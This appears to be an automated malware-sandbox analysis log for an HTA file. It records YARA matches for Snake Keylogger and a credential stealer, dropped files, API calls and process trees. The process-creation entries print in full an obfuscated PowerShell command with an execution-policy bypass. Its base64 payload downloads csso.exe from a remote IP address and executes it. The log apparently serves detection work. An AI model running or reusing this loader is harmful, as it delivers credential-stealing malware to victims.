                    Source: 6.2.csso.exe.30f0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 6.2.csso.exe.30f0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 6.2.csso.exe.30f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 6.2.csso.exe.30f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: Process Memory Space: csso.exe PID: 7620, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: RegSvcs.exe PID: 7656, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Binary is likely a compiled AutoIt script file
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: This is a third-party compiled AutoIt script.6_2_00023B3A
                    Source: csso.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: csso.exe, 00000006.00000002.1395985820.00000000000D4000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_055c094b-3
                    Source: csso.exe, 00000006.00000002.1395985820.00000000000D4000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_f93ebf25-3
                    Source: csso.exe.3.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e6ee0129-1
                    Source: csso.exe.3.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_75feca7c-1
                    Source: csso[1].exe.3.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7e97db8c-5
                    Source: csso[1].exe.3.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_bb1762b2-d
                    Powershell drops PE file
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\csso.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csso[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0008A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,6_2_0008A1EF
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00078310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,6_2_00078310
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000851BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,6_2_000851BD
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0002E6A06_2_0002E6A0
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0004D9756_2_0004D975
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0002FCE06_2_0002FCE0
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000421C56_2_000421C5
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000562D26_2_000562D2
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000A03DA6_2_000A03DA
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0005242E6_2_0005242E
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000425FA6_2_000425FA
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0007E6166_2_0007E616
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000366E16_2_000366E1
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0005878F6_2_0005878F
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000388086_2_00038808
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000568446_2_00056844
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000A08576_2_000A0857
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000888896_2_00088889
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0004CB216_2_0004CB21
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00056DB66_2_00056DB6
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00036F9E6_2_00036F9E
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000330306_2_00033030
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000431876_2_00043187
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0004F1D96_2_0004F1D9
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000212876_2_00021287
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000414846_2_00041484
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000355206_2_00035520
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000476966_2_00047696
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000357606_2_00035760
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000419786_2_00041978
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00059AB56_2_00059AB5
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00041D906_2_00041D90
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0004BDA66_2_0004BDA6
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000A7DDB6_2_000A7DDB
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0002DF006_2_0002DF00
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00033FE06_2_00033FE0
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00A728F06_2_00A728F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0245C1687_2_0245C168
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0245CAB07_2_0245CAB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_024519B87_2_024519B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_02457E687_2_02457E68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_02454F087_2_02454F08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_02452DD17_2_02452DD1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0245CAAE7_2_0245CAAE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0245B9DC7_2_0245B9DC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0245B9E07_2_0245B9E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_02457E667_2_02457E66
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_02454EF87_2_02454EF8
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: String function: 00027DE1 appears 35 times
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: String function: 00040AE3 appears 70 times
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: String function: 00048900 appears 42 times
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                    Source: 7.2.RegSvcs.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 7.2.RegSvcs.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 6.2.csso.exe.30f0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 6.2.csso.exe.30f0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 6.2.csso.exe.30f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 6.2.csso.exe.30f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000007.00000002.2525234077.0000000000382000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000006.00000002.1396918507.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: Process Memory Space: csso.exe PID: 7620, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: RegSvcs.exe PID: 7656, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 6.2.csso.exe.30f0000.1.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 6.2.csso.exe.30f0000.1.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winHTA@14/15@2/3
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0008A06A GetLastError,FormatMessageW,6_2_0008A06A
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000781CB AdjustTokenPrivileges,CloseHandle,6_2_000781CB
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_000787E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,6_2_000787E1
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0008B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,6_2_0008B333
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0009EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,6_2_0009EE0D
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_0008C397 CoInitialize,CoCreateInstance,CoUninitialize,6_2_0008C397
                    Source: C:\Users\user\AppData\Roaming\csso.exeCode function: 6_2_00024E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,6_2_00024E89
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csso[1].exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eo40twkl.1zn.ps1Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: RegSvcs.exe, 00000007.00000002.2527369873.0000000002730000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2528773655.000000000363D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2527369873.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2527369873.00000000026F0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2527369873.0000000002723000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2527369873.000000000270E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: uhg.htaVirustotal: Detection: 33%
                    Source: uhg.htaReversingLabs: Detection: 23%
                    Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\uhg.hta"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZU5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI='+[cHar]34+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZU5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI='+[cHar]34+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC24D.tmp" "c:\Users\user\AppData\Local\Temp\hbmngfjp\CSCC4E96BC32174751BC6DB24E42E04ED1.TMP"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\csso.exe "C:\Users\user\AppData\Roaming\csso.exe"
                    Source: C:\Users\user\AppData\Roaming\csso.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\csso.exe"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'JGogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtQkVSRGVmaU5pdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJMbW9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSndGRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHlwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgekopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkh1d0pyTXVkSEwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZWR2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjgvNTAvY3Nzby5leGUiLCIkZU5WOkFQUERBVEFcY3Nzby5leGUiLDAsMCk7U3RBUlQtU0xFZXAoMyk7aU5Wb0tlLUl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxjc3NvLmV4ZSI='+[cHar]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; 